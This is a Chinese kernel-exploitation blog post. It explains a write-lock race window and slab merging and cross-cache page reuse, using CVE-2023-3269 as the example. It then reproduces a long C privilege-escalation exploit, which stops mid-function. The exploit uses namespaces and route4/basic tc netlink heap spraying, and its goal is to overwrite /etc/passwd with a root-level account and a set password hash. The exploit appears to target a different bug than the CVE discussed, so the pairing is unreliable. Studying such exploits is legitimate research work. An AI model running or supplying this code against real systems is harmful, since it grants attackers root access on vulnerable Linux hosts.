通过前面简要的说明可以看出来这里是存在一个条件竞争的关系,需要在第一个写入垃圾字符,第二个写入恶意字符还没写入时完成偷梁换柱的戏码,看过上一篇文章的朋友可能就会想到使用fuse即可实现,虽然从理论上讲是可以的,但其最终都会利用到内核实现的write的机制。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
ssize_t vfs_write(struct file *file, const char __user *buf, size_t count, loff_t *pos)
{
ssize_t ret;

if (!(file->f_mode & FMODE_WRITE))
return -EBADF;
if (!(file->f_mode & FMODE_CAN_WRITE))
return -EINVAL;
if (unlikely(!access_ok(buf, count)))
return -EFAULT;

ret = rw_verify_area(WRITE, file, pos, count);
if (ret)
return ret;
if (count > MAX_RW_COUNT)
count = MAX_RW_COUNT;
file_start_write(file);
if (file->f_op->write)
ret = file->f_op->write(file, buf, count, pos);
else if (file->f_op->write_iter)
ret = new_sync_write(file, buf, count, pos);
else
ret = -EINVAL;
if (ret > 0) {
fsnotify_modify(file);
add_wchar(current, ret);
}
inc_syscw(current);
file_end_write(file);
return ret;
}

在经过几层调用,write会进入到上述函数中,可以看到在函数的开头部分会检查该文件是否可以写入随后执行file_start_write然后调用ops中的write最后执行file_end_write

1
2
3
4
5
6
7
8
9
10
11
12
13
static inline void file_start_write(struct file *file)
{
if (!S_ISREG(file_inode(file)->i_mode))
return;
sb_start_write(file_inode(file)->i_sb);
}

static inline void file_end_write(struct file *file)
{
if (!S_ISREG(file_inode(file)->i_mode))
return;
__sb_end_write(file_inode(file)->i_sb, SB_FREEZE_WRITE);
}

其实这个file_start_writefile_end_write很容易猜出来其功能是什么,这里就是给write加上一个inode锁,当进程A在往程序中写入时进程B会被阻塞在file_start_write的位置,那也就意味着进程B已经通过了程序是否可写的验证了,只是等待进程A写完就会开始写入了,所以在此期间实现上面的偷梁换柱即可,而延长窗口时间的办法就是进程A写入大量数据使进程B阻塞时间延长。

篇外CVE-2023-3269

(与本文无瓜,这里主要举个cross-cache的🌰,仔细看了一下感觉这个考虑的问题比此篇文章考虑的要多一点)

这个漏洞就不展开讲述了,其是一个UAF漏洞,在cpu0访问vma时cpu1触发expand_stack时有一定几率会因为expand_stack释放掉对应的maple node,而另外一边则还在试图访问vma,当然是可以通过某种方式延长窗口时间,这里不过多提到。

所以如果我们想要实现任意地址读则需要用可控的结构体去占领比如msg_msg,可惜的是我们单纯堆喷msg_msg是无法在内存中申请到对应的位置的。

此漏洞的攻击方式从两个方向考虑的,第一就是开启了CONFIG_SLAB_MERGE_DEFAULT选项时(该选项默认开启),意味着打开了slab重用机制,这里简单介绍一下slab重用机制。

向pipe_buffer说yes!篇文章中详细描述了一个slab的申请过程但并没有讨论重用slab的选项,这里首先提一下重用的条件,在后续的代码中可以一一得到验证便于理解

  • 对方的slab cache和自己的flag都不开启SLAB_NEVER_MERGE

  • 对方的slab cache和自己都没有构造函数

  • 对方的slab cache和自己的usersize都为0

  • 对方的slab大小和自己的相同

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
struct kmem_cache *
kmem_cache_create_usercopy(const char *name,
unsigned int size, unsigned int align,
slab_flags_t flags,
unsigned int useroffset, unsigned int usersize,
void (*ctor)(void *))
{
struct kmem_cache *s = NULL;
const char *cache_name;
int err;

#ifdef CONFIG_SLUB_DEBUG
/*
* If no slub_debug was enabled globally, the static key is not yet
* enabled by setup_slub_debug(). Enable it if the cache is being
* created with any of the debugging flags passed explicitly.
*/
if (flags & SLAB_DEBUG_FLAGS)
static_branch_enable(&slub_debug_enabled);
#endif

mutex_lock(&slab_mutex);

err = kmem_cache_sanity_check(name, size);
if (err) {
goto out_unlock;
}

/* Refuse requests with allocator specific flags */
if (flags & ~SLAB_FLAGS_PERMITTED) {
err = -EINVAL;
goto out_unlock;
}

/*
* Some allocators will constraint the set of valid flags to a subset
* of all flags. We expect them to define CACHE_CREATE_MASK in this
* case, and we'll just provide them with a sanitized version of the
* passed flags.
*/
flags &= CACHE_CREATE_MASK;

/* Fail closed on bad usersize of useroffset values. */
if (WARN_ON(!usersize && useroffset) ||
WARN_ON(size < usersize || size - usersize < useroffset))
usersize = useroffset = 0;

if (!usersize)
s = __kmem_cache_alias(name, size, align, flags, ctor);
if (s)
goto out_unlock;

cache_name = kstrdup_const(name, GFP_KERNEL);
if (!cache_name) {
err = -ENOMEM;
goto out_unlock;
}

s = create_cache(cache_name, size,
calculate_alignment(flags, align, size),
flags, useroffset, usersize, ctor, NULL);
if (IS_ERR(s)) {
err = PTR_ERR(s);
kfree_const(cache_name);
}

out_unlock:
mutex_unlock(&slab_mutex);

if (err) {
if (flags & SLAB_PANIC)
panic("%s: Failed to create slab '%s'. Error %d\n",
__func__, name, err);
else {
pr_warn("%s(%s) failed with error %d\n",
__func__, name, err);
dump_stack();
}
return NULL;
}
return s;
}
EXPORT_SYMBOL(kmem_cache_create_usercopy);

在代码中会验证usersize是否为0,如果是则调用__kmem_cache_alias寻找可重用的slab如果找到了则直接退出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
struct kmem_cache *
__kmem_cache_alias(const char *name, unsigned int size, unsigned int align,
slab_flags_t flags, void (*ctor)(void *))
{
struct kmem_cache *s;

s = find_mergeable(size, align, flags, name, ctor);
if (s) {
s->refcount++;

/*
* Adjust the object sizes so that we clear
* the complete object on kzalloc.
*/
s->object_size = max(s->object_size, size);
s->inuse = max(s->inuse, ALIGN(size, sizeof(void *)));

if (sysfs_slab_alias(s, name)) {
s->refcount--;
s = NULL;
}
}

return s;
}

继续跟进函数,可以发现其内部其实就是调用了一个find_mergeable去寻找slab

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
struct kmem_cache *find_mergeable(unsigned int size, unsigned int align,
slab_flags_t flags, const char *name, void (*ctor)(void *))
{
struct kmem_cache *s;

if (slab_nomerge)
return NULL;

if (ctor)
return NULL;

size = ALIGN(size, sizeof(void *));
align = calculate_alignment(flags, align, size);
size = ALIGN(size, align);
flags = kmem_cache_flags(size, flags, name);

if (flags & SLAB_NEVER_MERGE)
return NULL;

list_for_each_entry_reverse(s, &slab_caches, list) {
if (slab_unmergeable(s))
continue;

if (size > s->size)
continue;

if ((flags & SLAB_MERGE_SAME) != (s->flags & SLAB_MERGE_SAME))
continue;
/*
* Check if alignment is compatible.
* Courtesy of Adrian Drzewiecki
*/
if ((s->size & ~(align - 1)) != s->size)
continue;

if (s->size - size >= sizeof(void *))
continue;

if (IS_ENABLED(CONFIG_SLAB) && align &&
(align > s->align || s->align % align))
continue;

return s;
}
return NULL;
}

而在函数内部则会校验前面提到的flags中不存在SLAB_NEVER_MERGE,随后遍历slab_caches全局链表使用slab_unmergeable函数查看是否可以重用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
static bool slab_nomerge = !IS_ENABLED(CONFIG_SLAB_MERGE_DEFAULT);

int slab_unmergeable(struct kmem_cache *s)
{
if (slab_nomerge || (s->flags & SLAB_NEVER_MERGE))
return 1;

if (s->ctor)
return 1;

if (s->usersize)
return 1;

/*
* We may have set a slab to be unmergeable during bootstrap.
*/
if (s->refcount < 0)
return 1;

return 0;
}

该函数会依次验证是否开启CONFIG_SLAB_MERGE_DEFAULT选项,flags标志位是否存在SLAB_NERVER_MERGE,是否存在构造函数,usersize是否为0,最后是引用次数小于0表示该slab准备释放无法重用。

以上就是slab重用的基本机制,从而可以得出,如果在开启了CONFIG_SLAB_MERGE_DEFAULT内核选项时存在UAFmaple node所在的slab是会进入到重用链表中取得,而后可以使用msg_msg结构体堆喷相同大小从而分配到UAFmaple node上去的。但是原文重点讲述了在没有开启CONFIG_SLAB_MERGE_DEFAULT选项时如何解决。

首先现在的很多计算机采用的时NUMA架构,意味着对于每个CPU来说是存在两条链表来存放被释放的slab,首先是cpu_slabNODEpartial list,又因为不存在CONFIG_SLAB_MERGE_DEFAULT选项的关系,被释放的slab是无法被申请重用的所以这里需要将slab UAF转化为page UAF

原文在这里使用的方式是通过clone/fork大量进程来申请大量相同的vma树,然后让一个slab中的所有内容都为我们的maple node,此时可以释放掉每个slab的多余的内容只留下一个object,最后触发漏洞,使其也被释放掉。因为一整个slab上的所有对象都被释放掉了,也就意味着此slab会被强制释放,随后会进入cpu_slab,如果我们前面申请的大量相同进程导致其满了则会进入nodepartial list如果也满了则会进入销毁slab的流程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
static void __slab_free(struct kmem_cache *s, struct page *page,
void *head, void *tail, int cnt,
unsigned long addr)

{
void *prior;
int was_frozen;
struct page new;
unsigned long counters;
struct kmem_cache_node *n = NULL;
unsigned long flags;

// ... ...

if (unlikely(!new.inuse && n->nr_partial >= s->min_partial))
goto slab_empty;

/*
* Objects left in the slab. If it was not on the partial list before
* then add it.
*/
if (!kmem_cache_has_cpu_partial(s) && unlikely(!prior)) {
remove_full(s, n, page);
add_partial(n, page, DEACTIVATE_TO_TAIL);
stat(s, FREE_ADD_PARTIAL);
}
spin_unlock_irqrestore(&n->list_lock, flags);
return;

slab_empty:
if (prior) {
/*
* Slab on the partial list.
*/
remove_partial(n, page);
stat(s, FREE_REMOVE_PARTIAL);
} else {
/* Slab must be on the full list */
remove_full(s, n, page);
}

spin_unlock_irqrestore(&n->list_lock, flags);
stat(s, FREE_SLAB);
discard_slab(s, page);
}

可以看到这里会验证数量是否满了,如果满了则会进入销毁流程调用discard_slab

1
2
3
4
5
static void discard_slab(struct kmem_cache *s, struct page *page)
{
dec_slabs_node(s, page_to_nid(page), page->objects);
free_slab(s, page);
}

discard_slab函数首先做的事是修改一些数据上的内容随后接着调用free_slab

1
2
3
4
5
6
7
static void free_slab(struct kmem_cache *s, struct page *page)
{
if (unlikely(s->flags & SLAB_TYPESAFE_BY_RCU)) {
call_rcu(&page->rcu_head, rcu_free_slab);
} else
__free_slab(s, page);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
static void __free_slab(struct kmem_cache *s, struct page *page)
{
int order = compound_order(page);
int pages = 1 << order;

if (kmem_cache_debug_flags(s, SLAB_CONSISTENCY_CHECKS)) {
void *p;

slab_pad_check(s, page);
for_each_object(p, s, page_address(page),
page->objects)
check_object(s, page, p, SLUB_RED_INACTIVE);
}

__ClearPageSlabPfmemalloc(page);
__ClearPageSlab(page);
/* In union with page->mapping where page allocator expects NULL */
page->slab_cache = NULL;
if (current->reclaim_state)
current->reclaim_state->reclaimed_slab += pages;
unaccount_slab_page(page, order, s);
__free_pages(page, order);
}

这里做的事就是获得pageorder去出page->slab_cache的指针,最后释放对应page。当释放page就好办了,可以大量堆喷msg_msgbuddy system申请page即可。

综上,可得exp

可以预见的是,这一利用方法是不需要依赖任何地址的,但是这里想要跑通exp需要修改一下config文件

1
2
3
4
CONFIG_NET_CLS_ROUTE4=y
CONFIG_DUMMY=y
CONFIG_NET_SCH_QFQ=y
CONFIG_NET_CLS_BASIC=y

(有点不想写exp了,如果没删这句话那下面exp就是原文的,如果删了就是自己写的好像删了你们也看不到)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
1050
1051
1052
#define _GNU_SOURCE

#include <arpa/inet.h>
#include <assert.h>
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <net/if.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <sched.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mount.h>
#include <sys/msg.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#include <sys/shm.h>
#include <sys/stat.h>
#include <sys/timerfd.h>

#include <linux/tc_ematch/tc_em_meta.h>
#include <sys/resource.h>

#include <linux/capability.h>
#include <linux/futex.h>
#include <linux/genetlink.h>
#include <linux/if_addr.h>
#include <linux/if_ether.h>
#include <linux/if_link.h>
#include <linux/if_tun.h>
#include <linux/in6.h>
#include <linux/ip.h>
#include <linux/kcmp.h>
#include <linux/neighbour.h>
#include <linux/net.h>
#include <linux/netlink.h>
#include <linux/pkt_cls.h>
#include <linux/pkt_sched.h>
#include <linux/rtnetlink.h>
#include <linux/tcp.h>
#include <linux/veth.h>

#include <x86intrin.h>

#include <err.h>
#include <fcntl.h>
#include <poll.h>
#include <pthread.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/utsname.h>
#include <unistd.h>

// #define DEBUG

char *target = "/etc/passwd";
char *overwrite =
"user:$1$user$k8sntSoh7jhsc6lwspjsU.:0:0:root:/root:/bin/bash\n";
char *global;
char *self_path;
char *content;

#define PAGE_SIZE 0x1000
#define MAX_FILE_NUM 0x8000

int fds[MAX_FILE_NUM] = {};
int fd_2[MAX_FILE_NUM] = {};
int overlap_a = -1;
int overlap_b = -1;

int cpu_cores = 0;
int sockfd = -1;

int spray_num_1 = 2000;
int spray_num_2 = 4000;

// int spray_num_1 = 4000;
// int spray_num_2 = 5000;

int pipe_main[2];
int pipe_parent[2];
int pipe_child[2];
int pipe_defrag[2];
int pipe_file_spray[2][2];

int run_write = 0;
int run_spray = 0;
char *passwd;
bool overlapped = false;

void DumpHex(const void *data, size_t size)
{
#ifdef DEBUG
char ascii[17];
size_t i, j;
ascii[16] = '\0';
for (i = 0; i < size; ++i)
{
printf("%02X ", ((unsigned char *)data)[i]);
if (((unsigned char *)data)[i] >= ' ' &&
((unsigned char *)data)[i] <= '~')
{
ascii[i % 16] = ((unsigned char *)data)[i];
}
else
{
ascii[i % 16] = '.';
}
if ((i + 1) % 8 == 0 || i + 1 == size)
{
printf(" ");
if ((i + 1) % 16 == 0)
{
printf("| %s \n", ascii);
}
else if (i + 1 == size)
{
ascii[(i + 1) % 16] = '\0';
if ((i + 1) % 16 <= 8)
{
printf(" ");
}
for (j = (i + 1) % 16; j < 16; ++j)
{
printf(" ");
}
printf("| %s \n", ascii);
}
}
}
#endif
}

void pin_on_cpu(int cpu)
{
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(cpu, &cpu_set);
if (sched_setaffinity(0, sizeof(cpu_set), &cpu_set) != 0)
{
perror("sched_setaffinity()");
exit(EXIT_FAILURE);
}
}

static bool write_file(const char *file, const char *what, ...)
{
char buf[1024];
va_list args;
va_start(args, what);
vsnprintf(buf, sizeof(buf), what, args);
va_end(args);
buf[sizeof(buf) - 1] = 0;
int len = strlen(buf);
int fd = open(file, O_WRONLY | O_CLOEXEC);
if (fd == -1)
return false;
if (write(fd, buf, len) != len)
{
int err = errno;
close(fd);
errno = err;
return false;
}
close(fd);
return true;
}

static void use_temporary_dir(void)
{
system("rm -rf exp_dir; mkdir exp_dir; touch exp_dir/data");
system("touch exp_dir/data2");
char *tmpdir = "exp_dir";
if (!tmpdir)
exit(1);
if (chmod(tmpdir, 0777))
exit(1);
if (chdir(tmpdir))
exit(1);
symlink("./data", "./uaf");
}

static void setup_common()
{
if (mount(0, "/sys/fs/fuse/connections", "fusectl", 0, 0))
{
}
}

static void adjust_rlimit()
{
struct rlimit rlim;
rlim.rlim_cur = rlim.rlim_max = (200 << 20);
setrlimit(RLIMIT_AS, &rlim);
rlim.rlim_cur = rlim.rlim_max = 32 << 20;
setrlimit(RLIMIT_MEMLOCK, &rlim);
rlim.rlim_cur = rlim.rlim_max = 136 << 20;
// setrlimit(RLIMIT_FSIZE, &rlim);
rlim.rlim_cur = rlim.rlim_max = 1 << 20;
setrlimit(RLIMIT_STACK, &rlim);
rlim.rlim_cur = rlim.rlim_max = 0;
setrlimit(RLIMIT_CORE, &rlim);
// RLIMIT_FILE
rlim.rlim_cur = rlim.rlim_max = 14096;
if (setrlimit(RLIMIT_NOFILE, &rlim) < 0)
{
rlim.rlim_cur = rlim.rlim_max = 4096;
spray_num_1 = 1200;
spray_num_2 = 2800;
if (setrlimit(RLIMIT_NOFILE, &rlim) < 0)
{
perror("setrlimit");
err(1, "setrlimit");
}
}
}

void setup_namespace()
{
int real_uid = getuid();
int real_gid = getgid();

if (unshare(CLONE_NEWUSER) != 0)
{
perror("[-] unshare(CLONE_NEWUSER)");
exit(EXIT_FAILURE);
}

if (unshare(CLONE_NEWNET) != 0)
{
perror("[-] unshare(CLONE_NEWUSER)");
exit(EXIT_FAILURE);
}

if (!write_file("/proc/self/setgroups", "deny"))
{
perror("[-] write_file(/proc/self/set_groups)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid))
{
perror("[-] write_file(/proc/self/uid_map)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid))
{
perror("[-] write_file(/proc/self/gid_map)");
exit(EXIT_FAILURE);
}
}

#define NLMSG_TAIL(nmsg) \
((struct rtattr *)(((void *)(nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len)))

int addattr(char *attr, int type, void *data, int len)
{
struct rtattr *rta = (struct rtattr *)attr;

rta->rta_type = type;
rta->rta_len = RTA_LENGTH(len);
if (len)
{
memcpy(RTA_DATA(attr), data, len);
}

return RTA_LENGTH(len);
}

int addattr_l(struct nlmsghdr *n, int maxlen, int type, const void *data,
int alen)
{
int len = RTA_LENGTH(alen);
struct rtattr *rta;

if (NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len) > maxlen)
{
fprintf(stderr, "addattr_l ERROR: message exceeded bound of %d\n", maxlen);
return -1;
}
rta = NLMSG_TAIL(n);
rta->rta_type = type;
rta->rta_len = len;
if (alen)
memcpy(RTA_DATA(rta), data, alen);
n->nlmsg_len = NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len);
return 0;
}

struct rtattr *addattr_nest(struct nlmsghdr *n, int maxlen, int type)
{
struct rtattr *nest = NLMSG_TAIL(n);

addattr_l(n, maxlen, type, NULL, 0);
return nest;
}

int addattr_nest_end(struct nlmsghdr *n, struct rtattr *nest)
{
nest->rta_len = (void *)NLMSG_TAIL(n) - (void *)nest;
return n->nlmsg_len;
}

int add_qdisc(int fd)
{
char *start = malloc(0x1000);
memset(start, 0, 0x1000);
struct nlmsghdr *msg = (struct nlmsghdr *)start;

// new qdisc
msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE;
msg->nlmsg_type = RTM_NEWQDISC;
struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr));
// set local
t->tcm_ifindex = 1;
t->tcm_family = AF_UNSPEC;
t->tcm_parent = TC_H_ROOT;
// prio, protocol
u_int32_t prio = 1;
u_int32_t protocol = 1;
t->tcm_info = TC_H_MAKE(prio << 16, protocol);

addattr_l(msg, 0x1000, TCA_KIND, "sfq", 4);

// packing
#ifdef DEBUG
DumpHex(msg, msg->nlmsg_len);
#endif

struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len};
struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK};
struct msghdr msgh = {
.msg_name = &nladdr,
.msg_namelen = sizeof(nladdr),
.msg_iov = &iov,
.msg_iovlen = 1,
};
return sendmsg(fd, &msgh, 0);
}

int add_tc_(int fd, u_int32_t from, u_int32_t to, u_int32_t handle,
u_int16_t flags)
{
char *start = malloc(0x2000);
memset(start, 0, 0x2000);
struct nlmsghdr *msg = (struct nlmsghdr *)start;

// new filter
msg = msg + msg->nlmsg_len;
msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
msg->nlmsg_flags = NLM_F_REQUEST | flags;
msg->nlmsg_type = RTM_NEWTFILTER;
struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr));

// prio, protocol
u_int32_t prio = 1;
u_int32_t protocol = 1;
t->tcm_info = TC_H_MAKE(prio << 16, protocol);
t->tcm_ifindex = 1;
t->tcm_family = AF_UNSPEC;
t->tcm_handle = handle;

addattr_l(msg, 0x1000, TCA_KIND, "route", 6);
struct rtattr *tail = addattr_nest(msg, 0x1000, TCA_OPTIONS);
addattr_l(msg, 0x1000, TCA_ROUTE4_FROM, &from, 4);
addattr_l(msg, 0x1000, TCA_ROUTE4_TO, &to, 4);
addattr_nest_end(msg, tail);

// packing
struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len};
struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK};
struct msghdr msgh = {
.msg_name = &nladdr,
.msg_namelen = sizeof(nladdr),
.msg_iov = &iov,
.msg_iovlen = 1,
};

sendmsg(fd, &msgh, 0);

free(start);
return 1;
}

void add_tc(int sockfd, uint32_t handle, uint16_t flag)
{
add_tc_(sockfd, 0, handle, (handle << 8) + handle, flag);
}

uint32_t calc_handle(uint32_t from, uint32_t to)
{
uint32_t handle = to;

assert(from <= 0xff && to <= 0xff);
handle |= from << 16;

if (((handle & 0x7f00) | handle) != handle)
return 0;

if (handle == 0 || (handle & 0x8000))
return 0;
return handle;
}

void *delete_tc_(int sockfd, u_int32_t handle)
{
char *start = malloc(0x4000);
memset(start, 0, 0x4000);
struct nlmsghdr *msg = (struct nlmsghdr *)start;

// new filter
msg = msg + msg->nlmsg_len;
msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_ECHO;
msg->nlmsg_type = RTM_DELTFILTER;
struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr));

// prio, protocol
u_int32_t prio = 1;
u_int32_t protocol = 1;
t->tcm_info = TC_H_MAKE(prio << 16, protocol);
t->tcm_ifindex = 1;
t->tcm_family = AF_UNSPEC;
t->tcm_handle = handle;

addattr_l(msg, 0x1000, TCA_KIND, "route", 6);
struct rtattr *tail = addattr_nest(msg, 0x1000, TCA_OPTIONS);
addattr_nest_end(msg, tail);

// packing
struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len};
struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK};
struct msghdr msgh = {
.msg_name = &nladdr,
.msg_namelen = sizeof(nladdr),
.msg_iov = &iov,
.msg_iovlen = 1,
};

sendmsg(sockfd, &msgh, 0);
memset(start, 0, 0x4000);
iov.iov_len = 0x4000;
iov.iov_base = start;
recvmsg(sockfd, &msgh, 0);

if (msgh.msg_namelen != sizeof(nladdr))
{
printf("size of sender address is wrong\n");
}
return start;
}

void delete_tc(int sockfd, uint32_t handle)
{
delete_tc_(sockfd, ((handle) << 8) + (handle));
}

// basic for spray
int add_tc_basic(int fd, uint32_t handle, void *spray_data, size_t spray_len,
int spray_count)
{
assert(spray_len * spray_count < 0x3000);
char *start = malloc(0x4000);
memset(start, 0, 0x4000);
struct nlmsghdr *msg = (struct nlmsghdr *)start;

// new filter
msg = msg + msg->nlmsg_len;
msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; // | flags;
msg->nlmsg_type = RTM_NEWTFILTER;
struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr));

// prio, protocol
u_int32_t prio = 1;
u_int32_t protocol = 1;
t->tcm_info = TC_H_MAKE(prio << 16, protocol);
t->tcm_ifindex = 1;
t->tcm_family = AF_UNSPEC;
t->tcm_handle = handle;
// t->tcm_parent = TC_H_ROOT;

addattr_l(msg, 0x4000, TCA_KIND, "basic", 6);
struct rtattr *tail = addattr_nest(msg, 0x4000, TCA_OPTIONS);
struct rtattr *ema_tail = addattr_nest(msg, 0x4000, TCA_BASIC_EMATCHES);
struct tcf_ematch_tree_hdr tree_hdr = {.nmatches = spray_count / 2,
.progid = 0};

addattr_l(msg, 0x4000, TCA_EMATCH_TREE_HDR, &tree_hdr, sizeof(tree_hdr));
struct rtattr *rt_match_tail =
addattr_nest(msg, 0x4000, TCA_EMATCH_TREE_LIST);

char *data = malloc(0x3000);
for (int i = 0; i < tree_hdr.nmatches; i++)
{
char *current;
memset(data, 0, 0x3000);
struct tcf_ematch_hdr *hdr = (struct tcf_ematch_hdr *)data;
hdr->kind = TCF_EM_META;
hdr->flags = TCF_EM_REL_AND;

current = data + sizeof(*hdr);

struct tcf_meta_hdr meta_hdr = {
.left.kind = TCF_META_TYPE_VAR << 12 | TCF_META_ID_DEV,
.right.kind = TCF_META_TYPE_VAR << 12 | TCF_META_ID_DEV,
};

current += addattr(current, TCA_EM_META_HDR, &meta_hdr, sizeof(hdr));
current += addattr(current, TCA_EM_META_LVALUE, spray_data, spray_len);
current += addattr(current, TCA_EM_META_RVALUE, spray_data, spray_len);

addattr_l(msg, 0x4000, i + 1, data, current - data);
}

addattr_nest_end(msg, rt_match_tail);
addattr_nest_end(msg, ema_tail);
addattr_nest_end(msg, tail);

// packing
struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len};
